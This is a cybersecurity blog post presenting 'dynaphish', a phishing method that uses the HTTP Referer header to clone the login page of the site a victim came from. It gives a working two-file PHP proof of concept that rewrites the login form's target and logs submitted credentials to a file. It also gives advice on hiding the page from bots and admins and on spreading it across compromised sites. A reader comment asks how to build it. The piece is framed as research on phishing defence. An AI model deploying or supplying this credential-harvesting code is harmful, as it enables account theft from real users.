• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar
Craig Hays

Craig Hays

  • Cybersecurity
  • Principles
  • Newsletter
  • Learn Cyber Security
    • Hacking and Defending User Accounts
    • Learning Guides
  • Contact
  • Show Search
Hide Search
You are here: Home / Cybersecurity / Dynamically create a phishing page based on the HTTP referer header

Dynamically create a phishing page based on the HTTP referer header

June 11, 2019 By Craig Hays 1 Comment

Reading Time: 3 minutes

Table of Contents

  • Auto-generated phishing pages and the social web.
  • Creating Phishing pages based on the HTTP referer tag
  • How dynamic phishing page creation works
    • Submit a phishing link to an online discussion space where users are likely already logged in
    • The victim clicks on the link to what they expect to be another post on the site
    • The victim’s browser requests the dynamic phishing page from the engine
    • The dynaphish engine examines the HTTP referer tag and retrieves the login page for that site
    • The dynaphish engine renders a login page identical to that of the referrer site except for the POST target of the login form
    • The user ‘logs in’ and is redirected back the expected content in their existing session
  • What this needs in order to work
  • Dynamic referer phishing pages – A Proof of Concept
  • Why this works

Auto-generated phishing pages and the social web.

(The following is a cybersecurity research article on credential theft using non-traditional and underexploited phishing methods.)

You’re browsing the web. You’re logged into an online discussion space such as YouTube, Reddit, Twitter, Medium, a small community forum, etc. You click on a link from another user to another page on the same site. Instead of seeing the content you’re looking for you’re presented with the login page for the site you’re already on. Annoyed and a little confused as to why you’ve been logged out, you log back in and are taken to the content you were expecting.

You’ve just been phished.

Creating Phishing pages based on the HTTP referer tag

When we hear “phishing attack” we usually think of email. We don’t usually think of web-based attacks through online discussion sites. Usually, these would be easy to spot and block. The novelty of this attack is in using the HTTP referer tag to customize the phishing page when the victim lands in order to make it look like a bug in the usual user experience. After all, how many times have you been browsing a site then been randomly asked to log back in again?

How dynamic phishing page creation works

How dynamic phishing pages work

Submit a phishing link to an online discussion space where users are likely already logged in

The link text will look like it points to another location on the same site but instead, it points to the dynamic phishing page engine

The victim clicks on the link to what they expect to be another post on the site

This could be another video, tweet, image, blog post, comment, etc.

The victim’s browser requests the dynamic phishing page from the engine

This also includes the HTTP referer tag which indicates the site the user was on previously.

The dynaphish engine examines the HTTP referer tag and retrieves the login page for that site

It does this by making requests to the referrer site for common login pages such as /login /admin /user /sign-up?type=login, etc.

The dynaphish engine renders a login page identical to that of the referrer site except for the POST target of the login form

This includes any dynamic content already on the site such as current news, headlines, top posts, tweets, etc.

The user ‘logs in’ and is redirected back the expected content in their existing session

As they already have a session open it looks like everything worked. They get the content they were looking for and are unaware that anything strange has happened

What this needs in order to work

Now, not everything is that simple. This attack relies on a few things:

  • The users trust the site they’re already on. The phishing page pulls enough recent content from the target site to make it look believable without too much inspection. We train our users to check for padlocks, green bars, SSL certificates, correct domain names, etc. from emails, but we generally don’t do this as meticulously when deep into a web browsing session on one site
  • The dynaphish engine can differentiate actually users from bots and site admins. As it inspects the headers of the web requests before rendering content, it is possible to mask the evil intentions from unwanted user agents, IP addresses, referers, and devices.
  • The domain can’t be on a known bad actor list. By dynamically rendering the phishing page content it makes it more difficult for analysis tools to identify the page as malicious until execution time, at which point it may be too late.

Dynamic referer phishing pages – A Proof of Concept

Here’s a very basic proof of concept possible with just two php files. The first is the landing page which will download and present the content of the referring website’s login page. The second is a credential capture and user forwarding page.

<?php
//index.php
if (isset($_SERVER['HTTP_REFERER'])  ) {
	$referer = $_SERVER['HTTP_REFERER'];
	$stripped = stripUrlPath($referer);
	$url = $stripped."/login";
	$loginpage = file_get_contents($url);
	$dom = new DOMDocument();
	$dom->loadHTML($loginpage);
	foreach($dom->getElementsByTagName('form') as $form) {
		$form->setAttribute('action', 'login.php?target='.$referer);
	}
	$result = $dom->saveHTML();
	print $result;
} else {
	print "error";
}
function stripUrlPath($url){
    $urlParts = parse_url($url);
    $newUrl = $urlParts['scheme'] . "://" . $urlParts['host'] . "/";
    return $newUrl;
}
?>
<?php
//login.php
$req_dump = print_r($_REQUEST, TRUE);
$fp = fopen('request.log', 'a');
fwrite($fp, $req_dump);
fclose($fp);
header('Location: '.$_GET["target"]);
?>

Why this works

By dynamically creating the phishing page it is easier to evade detection, gain the trust of users by presenting an expected screen that is identical to the real thing, and easier to deploy as any compromised website can host a landing page for any other site.

By using a dynamic redirection mechanism that behaves like any URL shortener it is possible to load balance across thousands of compromised websites through a few routing domains adding a level of resilience into the design

Filed Under: Cybersecurity Tagged With: Phishing, phishing pages, phishing simulation

Newsletter

Want to get smarter about cyber security? Join my growing list of newsletter readers for exclusive news, reviews, how-tos, and more.

Reader Interactions

Comments

  1. odiraa says

    January 6, 2021 at 2:07 am

    please i will like to learn how to build this on my own. This is just for education purpose because i am in love with IT. but i am not just so lucky to have someone around to put me through.

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Primary Sidebar

Newsletter

Want to get smarter about cyber security? Join my growing list of newsletter readers for exclusive news, reviews, how-tos, and more.

· © Craig Hays, 2006–2023 ·

  • Phishing